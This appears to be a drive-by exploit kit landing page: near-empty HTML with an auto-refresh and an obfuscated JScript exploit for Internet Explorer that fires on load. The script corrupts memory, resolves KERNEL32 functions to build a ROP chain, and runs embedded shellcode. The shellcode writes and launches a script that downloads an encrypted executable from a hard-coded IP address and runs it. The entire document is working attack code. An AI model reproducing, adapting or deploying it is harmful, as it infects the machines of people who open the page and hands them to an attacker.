
	
	<html>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<meta http-equiv="refresh" content="14">
<body>
	<div id="sdfdd43" style="overflow:scroll; width: 2px">
		<div id="vcbdfg34" style="width:5000001px">
			Contenty
		</div>
	</div>
	

<script language="Jscript.Encode">
	
var a="1.db";
var b="2.js";
var c=2;
var d=2;
var e=4;
var f=0x10;
var g=8;
var h=0xC0;
var i=0x10;
var j=0x38;
var k=0x48;
var l="\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000"+

"\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\u000D\u0000\uFFDF\uFFFF\u0000\u0000\u030C\u000D\u0000\uFFF0\uFFFF\u0000\u0000\u0AFF\u0073\u6111\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100\u6100";

var m="\u18E8\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u6A00\u9000\u9090"+

"\ue8fc\u0082\u0000\u8960\u31e5\u64c0\u508b\u8b30\u0c52\u528b\u8b14\u2872\ub70f\u264a\uff31\u3cac\u7c61\u2c02\uc120\u0dcf\uc701\uf2e2\u5752\u528b\u8b10\u3c4a\u4c8b\u7811\u48e3\ud101\u8b51\u2059\ud301\u498b\ue318\u493a\u348b\u018b\u31d6\uacff\ucfc1\u010d\u38c7\u75e0\u03f6\uf87d\u7d3b\u7524\u58e4\u588b\u0124\u66d3\u0c8b\u8b4b\u1c58\ud301\u048b\u018b\u89d0\u2444\u5b24\u615b\u5a59\uff51\u5fe0\u5a5f\u128b\u8deb\u6a5d\u8d01\ub285\u0000\u5000\u3168\u6f8b\uff87\ubbd5\u1de0\u0a2a\ua668\ubd95\uff9d\u3cd5\u7c06\u800a\ue0fb\u0575\u47bb\u7213\u6a6f\u5300\ud5ff\u6d63\u2e64\u7865\u2065\u712f\u2f20\u2063\u6463\u2f20\u2064\u2522\u6d74\u2570\u2022\u2626\u6520\u6863\u206f\u7566\u636e\u6974\u6e6f\u4f20\u6c28\u7b29\u6572\u7574\u6e72\u4d20\u7461\u2e68\u6172\u646e\u6d6f\u2928\u742e\u536f\u7274\u6e69\u2867\u3633\u2e29\u6c73\u6369\u2865\u352d\u7d29\u663b\u6e75\u7463\u6f69\u206e\u2856\u296b\u767b\u7261\u7920\u513d\u793b\u225b\u6573\u2274\u222b\u7250\u786f\u2279\u285d\u296e\u793b\u6f2e\u6570\u286e\u4722\u5445\u2c22\u286b\u2931\u312c\u3b29\u2e79\u704f\u6974\u6e6f\u6e28\u3d29\u286b\u2932\u793b\u732e\u6e65\u2864\u3b29\u2f79\u582a\u5341\u3158\u5341\u4158\u5353\u2f2a\u225b\u6157\u7469\u2b22\u4622\u726f\u6552\u7073\u6e6f\u6573\u5d22\u2928\u693b\u2866\u3032\u3d30\u793d\u732e\u6174\u7574\u2973\u6572\u7574\u6e72\u5f20\u7928\u722e\u7365\u6f70\u736e\u5465\u7865\u2c74\u286b\u296e\u7d29\u663b\u6e75\u7463\u6f69\u206e\u285f\u2c6b\u2965\u667b\u726f\u7628\u7261\u6c20\u303d\u6e2c\u632c\u5b3d\u2c5d\u3d46\u3532\u2d36\u2c31\u3d53\u7453\u6972\u676e\u712c\u5b3d\u2c5d\u3d62\u3b30\u3532\u5e36\u623e\u623b\u2b2b\u6329\u625b\u3d5d\u3b62\u6f66\u2872\u3d62\u3b30\u3532\u5e36\u623e\u623b\u2b2b\u6c29\u6c3d\u632b\u625b\u2b5d\u5b65\u6322\u6168\u2b22\u7222\u6f43\u6564\u7441\u5d22\u6228\u6525\u6c2e\u6e65\u7467\u2968\u265e\u2c46\u3d6e\u5b63\u5d62\u632c\u625b\u3d5d\u5b63\u5d6c\u632c\u6c5b\u3d5d\u3b6e\u6f66\u2872\u6176\u2072\u3d70\u3d6c\u3d62\u3b30\u5e70\u6b3c\u6c2e\u6e65\u7467\u3b68\u2b70\u292b\u3d62\u2b62\u5e31\u4626\u6c2c\u6c3d\u632b\u625b\u5e5d\u4626\u6e2c\u633d\u625b\u2c5d\u5b63\u5d62\u633d\u6c5b\u2c5d\u5b63\u5d6c\u6e3d\u712c\u702e\u7375\u2868\u2e53\u7266\u6d6f\u6843\u7261\u6f43\u6564\u6b28\u632e\u6168\u4372\u646f\u4165\u2874\u2970\u5e5e\u5b63\u5b63\u5d62\u632b\u6c5b\u5e5d\u4626\u295d\u3b29\u6572\u7574\u6e72\u7120\u6a2e\u696f\u286e\u2222\u7d29\u743b\u7972\u767b\u7261\u7520\u573d\u6353\u6972\u7470\u452e\u6863\u286f\u2c29\u3d6f\u4f22\u6a62\u6365\u2274\u412c\u4d3d\u7461\u2c68\u3d61\u7546\u636e\u6974\u6e6f\u2228\u2262\u222c\u6572\u7574\u6e72\u5720\u6353\u6972\u7470\u432e\u6572\u7461\u2265\u6f2b\u222b\u6228\u2229\u3b29\u3d50\u2228\u2b22\u5357\u7263\u7069\u2974\u732e\u6c70\u7469\u2228\u2220\u5b29\u5d31\u4d2c\u223d\u6e69\u6564\u4f78\u2266\u712c\u613d\u5028\u222b\u6e69\u2e67\u6946\u656c\u7953\u7473\u6d65\u2b22\u296f\u6d2c\u573d\u6353\u6972\u7470\u412e\u6772\u6d75\u6e65\u7374\u652c\u223d\u6957\u486e\u5454\u2250\u5a2c\u223d\u6d63\u2264\u512c\u613d\u2228\u6957\u486e\u2b22\u7422\u7074\u572e\u6e69\u7448\u7074\u6552\u7571\u7365\u2e74\u2e35\u2231\u2c29\u3d6a\u2861\u5722\u2b22\u2b50\u2e22\u6853\u6c65\u226c\u2c29\u3d73\u2861\u4122\u4f44\u4244\u532e\u7274\u6165\u226d\u2c29\u3d78\u284f\u2938\u222b\u222e\u702c\u223d\u7865\u2265\u6e2c\u303d\u4b2c\u573d\u6353\u6972\u7470\u505b\u222b\u7546\u6c6c\u614e\u656d\u5d22\u452c\u223d\u222e\u702b\u593b\u223d\u7954\u6570\u3b22\u5b73\u5d59\u323d\u733b\u432e\u6168\u7372\u7465\u223d\u7369\u2d6f\u3838\u3935\u312d\u3b22\u2e73\u704f\u6e65\u2928\u743b\u7972\u767b\u563d\u6d28\u7d29\u6163\u6374\u2868\u2957\u767b\u563d\u6d28\u7d29\u643b\u763d\u632e\u6168\u4372\u646f\u4165\u2874\u3230\u2b37\u5b76\u5d4d\u2228\u4550\u785c\u3030\u785c\u3030\u2922\u3b29\u2e73\u7257\u7469\u5465\u7865\u2874\u2976\u693b\u2866\u3233\u312d\u3c5e\u2964\u767b\u7261\u7a20\u313d\u783b\u3d2b\u6422\u6c6c\u7d22\u6c65\u6573\u7820\u3d2b\u3b70\u2e73\u6173\u6576\u6f74\u6966\u656c\u7828\u322c\u3b29\u2e73\u6c43\u736f\u2865\u3b29\u5e7a\u5e26\u2826\u3d78\u7222\u6765\u7673\u2272\u332b\u2b32\u2b45\u2022\u732f\u2220\u782b\u3b29\u2e6a\u7572\u286e\u2b5a\u2b45\u2022\u632f\u2220\u782b\u302c\u7d29\u6163\u6374\u2868\u5878\u5341\u4158\u5353\u4141\u7b29\u3b7d\u2e71\u6544\u656c\u6574\u6966\u656c\u4b28\u3b29\u333e\u742e\u704d\u2620\u2026\u7320\u4174\u7472\u7720\u4373\u6972\u5470\u2f20\u422f\u2f20\u452f\u4a3a\u6353\u6972\u7470\u3320\u742e\u704d\u2220\u7663\u6462\u6766\u2022\u6822\u7474\u3a70\u2f2f\u3831\u2e38\u3232\u2e37\u3031\u2e37\u3531\u2f36\u4d3f\u516a\u4f34\u6354\u2677\u424f\u4453\u6476\u784e\u2666\u616f\u6e31\u3d34\u4878\u5133\u724d\u594c\u5262\u4676\u5946\u6662\u664c\u4b6a\u7152\u6246\u554e\u7326\u6832\u3474\u763d\u4752\u4b55\u7856\u326f\u6b62\u7236\u4550\u7135\u5a70\u5844\u7047\u4462\u4431\u6d42\u7167\u3656\u4841\u6d31\u742d\u425f\u6530\u5a72\u664f\u4351\u7a35\u6155\u6577\u4567\u6d77\u3059\u414d\u3556\u5f41\u3371\u3337\u5845\u6e51\u4b42\u6765\u4f70\u714b\u4752\u4e4f\u6b77\u5f58\u6170\u4563\u5537\u6935\u6e6c\u7931\u5572\u4a57\u6873\u7830\u5852\u7552\u4947\u5f46\u344f\u5763\u6b6c\u7667\u6c41\u6e54\u7236\u2637\u7a46\u4646\u4e41\u5954\u4d79\u3d51\u223d\u2220\u2232";

function n(a,b,c){var d=new Array();
var sdfdf = 8*2;
d.push(a,0x00,0x00,0x00,b&0xFFFF,(b>>sdfdf)&0xFFFF,c&0xFFFF,(c>>sdfdf)&0xFFFF);
return String.fromCharCode.apply(null,d);
}var o=new Array();
var p=new Array();
var q=new Array();
var r=new Array();
var s=new Array();
var t=new Array();
var u=new Array();
var v=new Array();
var w=0;
var x=2*100-1;
var y=70;
var z=x-20;
for(var A=0;
A<0x1000;
A++)v[A]=new Array();
for(var A=0;
A<100;
A++)u[A]=new Array(1,2);
var B="\u0000\u0000";
while(B.length<0x17a)B+=n(0x0082);
B+="\u0003";
function C(a,b){t.push(arguments);
w+=2;
if(w>=(z-y)){eval("Collec"+"tGarbage();");
for(var c=0;
c<100*100;
c++)o[c]=new Object();
for(var c=0;
c<x;
c++)try{throw s[c];
}catch(d){p[c]=d;
}for(var c=y;
c<z;
c++)t[((c-y)/2)|0][(c-y)%2]=p[c];
for(var c=0;
c<100*100;
c++)o[c]=null;
eval("Collec"+"tGarbage();");
for(var c=0;
c<x;
c++)p[c]=null;
eval("Collec"+"tGarbage();");
for(var c=0;
c<0x1000;
c++)v[c][B]=1;
for(var c=y;
c<z;
c++)q[c]=t[((c-y)/2)|0][(c-y)%2];
}else u[w/2]["sort"](C);
return 0;
}for(var A=0;
A<x;
A++)r[A]=new RegExp(l);
for(var A=0;
A<x;
A++){var D=new Array({},r[A],{});
var E=new Enumerator(D);
E.moveFirst();
E.moveNext();
s[A]=E.item();
E.moveNext();
E=null;
delete E;
D[1]=null;
delete D[1];
r[A]=null;
delete r[A];
}u[0].sort(C);
var F=new Array();
for(var A=0;
A<x;
A++)try{throw s[A];
}catch(G){F[A]=G.source;
}var H=-1;
for(var A=0;
A<x;
A++)try{if((typeof q[A])==="number"){H=A;
break;
}}catch(E){}if(H==-1)throw new Error(" ");
else{}t=null;
q[H-1]=null;
delete q[H-1];
q[H-2]=null;
delete q[H-2];
q[H-3]=null;
delete q[H-3];
q[H-5]=null;
delete q[H-5];
q[H-6]=null;
delete q[H-6];
q[H-7]=null;
delete q[H-7];
q[H-8]=null;
delete q[H-8];
q[H-10]=null;
delete q[H-10];
q[H-11]=null;
delete q[H-11];
q[H-12]=null;
delete q[H-12];
q[H-13]=null;
delete q[H-13];
q[H-15]=null;
delete q[H-15];
q[H-16]=null;
delete q[H-16];
q[H-17]=null;
delete q[H-17];
q[H-18]=null;
delete q[H-18];
q[H-19]=null;
delete q[H-19];
q[H-20]=null;
delete q[H-20];
var I=q[H]&0xFFFFFFFF;
var J="\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF"+n(0x0082,I+4);
for(var A=x;
A>=H;
A--)q[A]=null;
for(var A=0;
A<0x1000;
A++)v[A][J]=1;
while(--H>=0)try{if((typeof q[H])==="string"&&q[H].length>0x1000)break;
else q[H]=null;
}catch(E){}if(H==-1)throw new Error(" ");
else{}var K=new Array();
var sdfjdsfsd = 0xFFFF;
K.push((q[H].length*2)&sdfjdsfsd);
K.push(((q[H].length*2)>>16)&sdfjdsfsd);
for(var A=0;
A<h/c;
A++)K.push(q[H]["charCodeAt"](A));
K[i/c]=0;
K[(i/c)+1]=0;
for(var A=0;
A<f/c;
A++){K[j/c+A]=K[k/c+A];
K[k/c+A]=0;
}for(var A=0;
A<m.length;
A++)K.push(0xCCCC);
var L=String.fromCharCode.apply(null,K);
for(var A=0;
A<x;
A++){s[A].compile(L);
s[A].source;
}var M=(q[H]["charCodeAt"](((k-4+g)/c)+1)<<16)|(q[H]["charCodeAt"]((k-4+g)/c)+2);
var N="\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF"+n(0x0082,M);
for(var A=x;
A>=H;
A--)q[A]=null;
for(var A=0;
A<0x1000;
A++)v[A][N]=1;
while(--H>=0)try{if((typeof q[H])==="string"&&q[H].length>0x1000)break;
else q[H]=null;
}catch(E){}if(H==-1)throw new Error(" ");
else{}var O=-1;
if(q[H]["charCodeAt"])O=(q[H]["charCodeAt"](4)<<16)|q[H]["charCodeAt"](3);
if(O==-1)throw new Error(" ");
var P="\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF"+n(0x0081,O);
for(var A=x;
A>=H;
A--)q[A]=null;
for(var A=0;
A<0x1000;
A++)v[A][P]=1;
while(--H>=0)try{if((typeof q[H])==="object")break;
else q[H]=null;
}catch(E){}if(H==-1)throw new Error(" ");
else{}var Q=q[H];
var R=Q.test("t");
if(!R)throw new Error(" ");
for(var A=0;
A<q.length;
A++)q[A]=null;
function S(a,b){try{var c=String.fromCharCode.apply(null,[0x0077,0x0110,0x0000,0x0000,0x0000,((b&0xFF)<<8)|0x03,(b&0xFFFF00)>>8,((a&0xFF)<<8)|(((b&0xFF000000)>>24)&0xFF),(a&0xFFFF00)>>8,(0x07<<8)|(((a&0xFF000000)>>24)&0xFF)]);
Q.test(c);
}catch(d){}return c;
}function T(a){S(O+k,0x82);
S(O+k+g,a+e-1);
return(Q.source.length>>7)&0xFF;
}function U(a){return((T(a+1)<<8)|T(a));
}function V(a){return((T(a+3)<<24)|(T(a+2)<<16)|(T(a+1)<<8)|T(a));
}function W(a){S(O+k,0x82);
S(O+k+g,a+0x50+4);
return Q.source;
}function X(a,b){if(b&1){var c=a["charCodeAt"](b/2)>>8;
var d=a["charCodeAt"]((b/2)+1)<<8;
var e=(a["charCodeAt"]((b/2)+2)&0xFF)<<24;
return e|d|c;
}else return((a["charCodeAt"]((b/2)+1)<<16)|(a["charCodeAt"](b/2)));
}function Y(a,b){if(b&1)return((a["charCodeAt"](b/2)>>8)&0xFF);
else return(a["charCodeAt"](b/2)&0xFF);
}var Z=V(O);
Z=Z&0xFFFF0000;
do if((V(Z+0x50)==0x70207369)&&(V(Z+0x54)==0x72676f72)&&(V(Z+0x58)==0x63206d61)&&(V(Z+0x5C)==0x6f6e6e61))break;
while(Z-=0x10000);
var ab=W(Z);
function ac(a){if(a<0x54)throw new Error(" ");
return X(ab,a-0x54);
}function ad(a){if(a<0x54)throw new Error(" ");
return Y(ab,a-0x54);
}var ae=V(Z+0x3C);
var af=ac(ae+0x18+0x60+(e*2));
var ag=ac(ae+0x18+0x60+(e*2)+e);
var ah="KERNEL32.dll";
var ai=false;
for(var aj=af;
aj<af+ag;
aj+=5*e){var ak=ac(aj+0x0C);
var al=new Array();
var am=0;
while((am=ad(ak++)))al.push(am);
var an=String.fromCharCode.apply(null,al);
if(ah===an){ai=true;
break;
}}if(!ai)throw new Error(" ");
var ao=ac(aj+0x10);
var ap=ac(ao);
ap=ap&0xFFFF0000;
do if((V(ap+0x50)==0x70207369)&&(V(ap+0x54)==0x72676f72)&&(V(ap+0x58)==0x63206d61)&&(V(ap+0x5C)==0x6f6e6e61))break;
while(ap-=0x10000);
var aq=W(ap);
function ar(a){if(a<0x54)throw new Error(" ");
return X(aq,a-0x54);
}function as(a){if(a<0x54)throw new Error(" ");
return Y(aq,a-0x54);
}function at(a){var b=V(ap+0x3C);
var c=ar(b+0x18+0x60);
var f=ar(b+0x18+0x60+e);
var g=ar(c+0x18);
var h=ar(c+0x1C);
var i=ar(c+0x20);
var j=ar(c+0x24);
for(nameIndex=0;
nameIndex<g;
nameIndex++){var k=ar(i+nameIndex*e);
var l=new Array();
var m=0;
while((m=as(k++)))l.push(m);
var n=String.fromCharCode.apply(null,l);
if(a===n)break;
}if(nameIndex==g)throw new Error(" ");
var o=U(ap+j+nameIndex*d);
return ap+ar(h+o*e);
}var au=at("VirtualProtect");
var av=null;
var ae=V(ap+0x3C);
var aw=ap+ae;
var ax=V(aw+0x1C);
var ay=V(aw+0x2C);
for(var A=0;
A<ax&&(av==null);
A++){var az=X(aq,ay+A-0x54);
if((az&0xFFFC)==0xC358){av=ap+ay+A;
continue;
}if((az&0xF800)!=0x5800)A++;
}var aA=S(O,V(O));
var aB=((aA["charCodeAt"](4)<<16)|aA["charCodeAt"](3))-0x44;
for(var A=0;
A<10;
A++)V(aB-(0x1000*A));
var aC=aB-8192;
var aD=at("GetModul"+"eHandleA");
var aE=at("GetProc"+"Address");
var aF=((aA["charCodeAt"](7)&0xFF)<<24)|(aA["charCodeAt"](6)<<8)|((aA["charCodeAt"](5)>>8)&0xFF);
var aG=aB;
for(var A=0;
A<m.length;
A++)S(O+h+(A*d),m["charCodeAt"](A));
var aH=aB-0x8000;
for(var A=0;
A<a.length;
A++)S(aH+(A*c),a["charCodeAt"](A));
var aI=aB-0x9000;
for(var A=0;
A<b.length;
A++)S(aI+(A*c),b["charCodeAt"](A));
var aJ=O+h+5;
S(aJ,aD);
S(aJ+e,aE);
S(aJ+(2*e),aF);
S(aJ+(3*e),aG);
S(aJ+(4*e),aH);
S(aJ+(5*e),aI);
S(aC-0x20,0x7FFE0000);
S(aC-0x1C,0x7FFE0000);
S(aC-0x18,0x7FFE0000);
S(aC-0x14,0x7FFE0000);
S(aC-0x10,0x7FFE0000);
S(aC-0x0C,0x7FFE0000);
S(aC-0x08,0x7FFE0000);
S(aC-0x04,0x7FFE0000);
S(aC+4,av+1);
S(aC+4+4+0x18,av);
S(aC+4+4+0x1C,av+1);
S(aC+4+4+0x20,au);
S(aC+4+4+4+0x20,O+h);
S(aC+4+4+4+4+0x20,O+h);
S(aC+4+4+4+4+4+0x20,(m.length*c));
S(aC+4+4+4+4+4+4+0x20,0x40);
S(aC+4+4+4+4+4+4+4+0x20,aC-0x1000);
S(aB,aC);

</script></body></html>